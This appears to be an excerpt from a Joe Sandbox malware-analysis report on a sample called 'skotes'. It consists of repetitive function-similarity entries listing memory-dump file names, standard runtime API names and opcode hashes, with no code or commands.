                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Resource$Concurrency::details::Execution$CurrentManager::Proxy::RemoveSchedulerThreadstd::invalid_argument::invalid_argument
                                                                                                                                                                • String ID: pScheduler
                                                                                                                                                                • API String ID: 246774199-923244539
                                                                                                                                                                • Opcode ID: 10f0025379c5632cfac86b94cbea6435a817cc3285c78fd0473d5397efa42060
                                                                                                                                                                • Instruction ID: 90e81bb3407b348f5d142e64e37fbc3a2a0643e8a387b2d76999e23699c06cbb
                                                                                                                                                                • Opcode Fuzzy Hash: 10f0025379c5632cfac86b94cbea6435a817cc3285c78fd0473d5397efa42060
                                                                                                                                                                • Instruction Fuzzy Hash: F7F0E935A04204B7C724FA54DC83C9EF7F99E93B14B1081EAE51577291DF70AE05C6A2
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _strrchr
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3213747228-0
                                                                                                                                                                • Opcode ID: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
                                                                                                                                                                • Instruction ID: 5f3d30ab04bd70401d27262421f5984d25a5ca766789051c56856d9e2c24de20
                                                                                                                                                                • Opcode Fuzzy Hash: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
                                                                                                                                                                • Instruction Fuzzy Hash: 2DB1F2329046469FDB15CF28C881BFEBFE5EF55340F1481EAE855EB242D6B49D01CBA0
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AdjustPointer
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1740715915-0
                                                                                                                                                                • Opcode ID: 45f1380a65c25d074ef5c8941ad1246fce10b399fbda161dafac0f641b732cb5
                                                                                                                                                                • Instruction ID: 6e0b552df05548820e03f6266e4a875f42a81866b9ba9db5a7ecc8b9bacede3e
                                                                                                                                                                • Opcode Fuzzy Hash: 45f1380a65c25d074ef5c8941ad1246fce10b399fbda161dafac0f641b732cb5
                                                                                                                                                                • Instruction Fuzzy Hash: 6D510872601A06AFDB399F18D881BFA77F5EF14700F1445ADE80167291E7B1ED41CB92
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: EqualOffsetTypeids
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1707706676-0
                                                                                                                                                                • Opcode ID: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
                                                                                                                                                                • Instruction ID: 34f01d5c77065350db4efb52fa364e90ff9c2f2381502425f4f861a44fe1d46d
                                                                                                                                                                • Opcode Fuzzy Hash: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
                                                                                                                                                                • Instruction Fuzzy Hash: 99515635A042099FDF11CF68C4806FEBBF5FF15354B1444EAE850A7352D7B2AE058B90
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Mtx_unlock$Cnd_broadcastCurrentThread
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3264154886-0
                                                                                                                                                                • Opcode ID: 3832f9e217e3698d0ca2fd07a5d4e9b671d07594ac4506cec6b6cef5a035f9f3
                                                                                                                                                                • Instruction ID: 7acbd353843db6011a3a6001708ffd6250a99c86db7fe1ca8d857deb74eb4c59
                                                                                                                                                                • Opcode Fuzzy Hash: 3832f9e217e3698d0ca2fd07a5d4e9b671d07594ac4506cec6b6cef5a035f9f3
